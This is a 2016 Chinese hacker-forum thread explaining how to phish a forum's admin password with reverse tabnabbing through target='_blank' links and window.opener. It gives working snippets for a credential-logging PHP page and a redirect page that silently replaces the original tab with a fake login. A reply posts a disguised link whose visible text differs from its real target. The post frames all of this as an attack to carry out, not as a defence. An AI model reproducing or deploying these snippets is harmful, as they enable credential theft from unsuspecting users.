搜索
查看: 2097|回复: 1

看我如何在论坛钓鱼

[复制链接]

432

主题

573

帖子

2539

积分

核心成员

Rank: 8Rank: 8

积分
2539
发表于 2016-10-26 17:44:41 | 显示全部楼层 |阅读模式
本帖最后由 Jumbo 于 2016-10-26 18:17 编辑

当用户点击了某个网站中带有target=”_blank”属性的超链接后,浏览器会单独新建一个标签页来显示该链接所指向的内容。但是请注意,在这一瞬间,浏览器会允许新建的标签页通过一个名为“window.opener”的浏览器API来与之前的网页进行短暂通信。
比如我要钓鱼一个论坛的后台密码,我先把他的html保存下载,然后我添加几行代码,示例代码如下:
$content = $_POST['name']
file_put_contents('password.txt',$content);
打开以后是这样的
1.png

然后我再创建个diaoyu.php文件,事例代码如下:
<meta http-equiv="refresh"content="1;url= https://pan.baidu.com/s/1eRFAiUQ">

<script>
if(window.opener){
window.opener.location  ="http://127.0.0.1/phish.php";
}
</script>
然后比如我发个帖,发完是这样的
2.png
点击以后是新开标签页是跳到了百度盘,如图
3.png
但是刚刚的标签页跳到了phish.php页面,
4.png
如果用户不小心,看到页面确实是跳到了下载页面,以为一开始的页面刷新了,然后不小心输入密码以后,

5.png
过程
phish.gif
您可以更新记录, 让好友们知道您在做什么...

2

主题

52

帖子

196

积分

我是新手

Rank: 1

积分
196
发表于 2016-10-27 21:40:18 | 显示全部楼层
<a href="http://127.0.0.1:88/diaoyu.php" target="_blank">[url]https://pan.baidu.com/s/1eRFAiUQ[/url]</a>


您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表